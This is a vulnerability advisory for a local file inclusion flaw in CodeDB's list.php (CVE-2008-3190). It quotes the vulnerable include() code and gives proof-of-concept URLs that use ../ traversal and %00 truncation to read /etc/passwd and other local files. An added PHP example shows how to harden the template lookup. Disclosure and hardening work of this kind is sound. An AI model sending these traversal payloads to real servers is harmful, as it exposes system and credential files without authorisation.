Topic : CodeDB (list.php lang) Local File Inclusion Vulnerability
SecurityAlert : 4001
CVE : CVE-2008-3190
CWE : Not in CWE
SecurityRisk : Medium
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : cOndemned
Published : 17.07.2008
Affected Software : CodeDB
Advisory Content :
###############################################################################
#
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################
Source :
// list.php (excerpt: lines 2, 7 and 8 of the file)
$lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol
if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension
    include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d
Proof of Concept :
http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00
http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00
EoF.
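
Added example (not part of the original advisory and not CodeDB's own code): one way to harden the template lookup shown in the Source excerpt, using an allow-list on the lang value plus a canonical-path containment check. The function name resolve_template(), the accepted language-code pattern and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example, not CodeDB code. resolve_template() and the sample values are
// hypothetical; 'templates/' and the '_middle.php' suffix come from the advisory.

// Return the absolute template path for $lang, or null if the value is rejected.
function resolve_template(string $lang, string $baseDir): ?string
{
    // 1. Allow-list the shape of a language code. This rejects '.', '/', '\'
    //    and NUL bytes, none of which htmlspecialchars() encodes.
    if (!preg_match('/\A[a-z]{2,8}(?:_[A-Za-z]{2,4})?\z/', $lang)) {
        return null;
    }
    // 2. Canonicalise, then confirm the file is still inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $lang . '_middle.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo: a temporary templates directory holding one template.
$root = sys_get_temp_dir() . '/codedb_demo_' . getmypid();
$dir = $root . '/templates';
mkdir($dir, 0700, true);
file_put_contents($dir . '/en_middle.php', "<?php // constructed template\n");

// Constructed inputs: one valid code, then the advisory's value shapes.
$samples = ['en', "../readme.txt\0", "../../../../etc/passwd\0", 'en/../en'];
foreach ($samples as $s) {
    $escaped = htmlspecialchars($s) === $s ? 'unchanged' : 'changed';
    $res = resolve_template($s, $dir);
    printf("%-28s htmlspecialchars: %s, lookup: %s\n",
        str_replace("\0", '%00', $s), $escaped,
        $res === null ? 'rejected' : basename($res));
}

unlink($dir . '/en_middle.php');
rmdir($dir);
rmdir($root);
```

PHP 5.3.4 and later reject file paths containing NUL bytes, which closes the %00 truncation used in the Proof of Concept. The allow-list is still needed, because htmlspecialchars() leaves the ../ traversal itself untouched.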
References :
http://securityreason.com/expldownload/1/4333/1 (Exploit)
http://xforce.iss.net/xforce/xfdb/43761
http://www.securityfocus.com/bid/30227
http://www.milw0rm.com/exploits/6071
http://www.frsirt.com/english/advisories/2008/2105/references
http://secunia.com/advisories/31053